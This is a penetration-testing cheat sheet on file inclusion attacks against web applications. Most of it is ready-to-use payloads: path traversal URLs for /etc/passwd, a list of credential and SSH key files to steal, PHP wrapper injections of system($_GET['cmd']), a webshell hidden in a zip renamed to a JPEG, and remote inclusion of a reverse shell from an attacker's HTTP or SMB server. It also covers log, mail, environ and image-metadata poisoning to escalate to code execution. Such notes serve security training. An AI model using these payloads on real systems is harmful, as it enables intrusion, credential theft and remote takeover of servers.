File Inclusion
File Inclusion refers to an inclusion attack through which an attacker can trick the web application into including files on the web server.
Introduction
Path Travesal can lead to two different types of File Inclusion:
Local File Inclusion (LFI): When is possible to include a local file.
Remote File Inclusion (RFI): When is possible to include remote files.
Path Traversal
Directory traversal (also known as file path traversal) is a web security vulnerability that allows an attacker to read arbitrary files on the server that is running an application.
A search for path traversals begins with the examination of URL query strings and form bodies in search of values that appears as file references, including the most common indicator as file extensions.
<img src="/loadImage?filename=218.png">The loadImage URL takes a filename parameter and returns the contents of the specified file. The image files themselves are stored on disk in the location /var/www/images/.
/var/www/images/218.pngSo we can request the following url to retrieve an arbitrary file from the server's filesystem:
https://insecure-website.com/loadImage?filename=../../../etc/passwdThis causes the application to read from the following file path /var/www/images/../../../etc/passwd
Interesting Files
There are some interesting files to read, such as information about the server (users, groups), logs, etc...
Linux
/etc/passwd
/etc/shadow
/etc/issue
/etc/group
/etc/hostname
/etc/ssh/ssh_config
/etc/ssh/sshd_config
/root/.ssh/id_rsa
/root/.ssh/authorized_keys
/home/user/.ssh/authorized_keys
/home/user/.ssh/id_rsa
/proc/[0-9]*/fd/[0-9]*
/proc/mounts
/home/$USER/.bash_history
/home/$USER/.ssh/id_rsa
/var/run/secrets/kubernetes.io/serviceaccount
/var/lib/mlocate/mlocate.db
/var/lib/mlocate.dbApache
/etc/apache2/apache2.conf
/usr/local/etc/apache2/httpd.conf
/etc/httpd/conf/httpd.conf
Red Hat/CentOS/Fedora Linux -> /var/log/httpd/access_log
Debian/Ubuntu -> /var/log/apache2/access.log
FreeBSD -> /var/log/httpd-access.log
/var/log/apache/access.log
/var/log/apache/error.log
/var/log/apache2/access.log
/var/log/apache/error.logMySQL
/var/lib/mysql/mysql/user.frm
/var/lib/mysql/mysql/user.MYD
/var/lib/mysql/mysql/user.MYIWindows
/boot.ini
/autoexec.bat
/windows/system32/drivers/etc/hosts
/windows/repair/SAM
/windows/panther/unattended.xml
/windows/panther/unattend/unattended.xml
/windows/system32/license.rtf
/windows/system32/eula.txtLocal File Inclusion (LFI)
Its similar to Path Traversal but not exactly the same, the difference is, in file inclusion if we include a PHP it will be interpreted and executed while in path traversal not.
PHP Wrappers
PHP provides several protocols wrappers that we can use to exploit path traversal and local file inclusion vulnerabilities. These filters give us additional flexibility when attempting to inject PHP code via LFI vulnerabilities.
Wrapper data://
Used to embed inline data as part of the URL with plaintext or base64.
/include.php?file=data:text/plain,<?php system($_GET["cmd"]);?>&cmd=id
/include.php?file=data:,<?php system($_GET["cmd"]);?>&cmd=id
/include.php?file=data:;base64,PD9waHAgc3lzdGVtKCRfR0VUWyJjbWQiXSk7Pz4=&cmd=idWrapper filter://
Used to encode/convert files. Usefull to read php files. The part of php://filter is case insensitive.
/include.php?file=php://filter/read=string.rot13/resource=file.php
/include.php?file=php://filter/conver.base64-encode/resource=file.php
/include.php?file=pHp://Filter/conver.base64-encode/resource=file.php
/include.php?file=php://filter/zlib.deflate/convert.base64-encode/resource=file.phpTo read the compression data you need to decode the base64 and read the resulting data using:
php -a
readfile('php://filter/zlib.inflate/resource=test.deflated');Wrapper zip://
Upload a Zip file with a PHPShell inside and access it.
echo "<pre><?php system($_GET['cmd']); ?></pre>" > payload.php;
zip payload.zip payload.php;
mv payload.zip shell.jpg;
rm payload.php
http://example.com/index.php?page=zip://shell.jpg%23payload.phpWrapper expect://
Used to execute code.
/include.php?file=except://idWrapper input://
Interpret php payload sent by POST parameters.
/include.php?file=php://input
POST DATA: <?php system($_GET["cmd"]);?>Remote File Inclusion (RFI)
When we are able to include remote files to the application is synonym of remote code execution. We can include a webshell or a reverse shell.
/usr/share/webshells/php/php-reverse-shell.phpOr you can create a php file with command execution or another type of reverse shell:
<?php
$output = shell_exec('whoami 2>&1');
echo "$output";
?>Finally you only need to set up a HTTP server or SMB server and request the rev shell.
/include.php?file=http://ip-addr:port/php-reverse-shell.php
/include.php?file=\\ip-addr\smbserver\php-reverse-shell.phpSome times impacket-smbserver doesn't works due to the outdated SMB version of the target machine and we need to configure it manually.
❯ cat /etc/samba/smb.conf
[global]
server role = standalone server
map to guest = Bad User
usershare allow guest = yes
host allow = <ip-target-machine>
[badsmb]
path = <directory>
browseable = yes
read only = no
guest ok = yesLooking to RCE
There are several ways to escalate a LFI to a RCE.
Via Log Poisoning
We can poison the logs with the user agent.
GET / HTTP/1.O
Host: example.com
User-Agent: <?php system($_GET["cmd"]);?>And try to access to /var/log/apache2/access.log.
/include.php?file=../../../../var/log/apache2/access.log&cmd=idVia Email
If SMTP is open in the server we can easily send a mail to an internal account. "user@localhost" containing the following payload <?php system($_GET["cmd"]);?>
And access to the mail inbox of the user.
/include.php?file=../../../../var/mail/user&cmd=idVia Environ
Like a log file, sending the payload in the User-Agent, it will be reflected inside the /proc/self/environ file.
GET /include.php?file=../../../../proc/self/environ&cmd=id HTTP/1.O
Host: example.com
User-Agent: <?php system($_GET["cmd"]);?>Via Upload
If exists a functionality that leads us to upload an arbitrary file, we can upload directly a reverse shell or simply upload a image with the payload injected on metadata.
To modify metadata of a file we can use exiftool.
exiftool -DocumentName='<?php system($_GET["cmd"]);?>' myimage.jpgOnce uploaded we can access it.
/include.php?file=../../uploads/myimage.jpg&cmd=idReferences
Last updated
Was this helpful?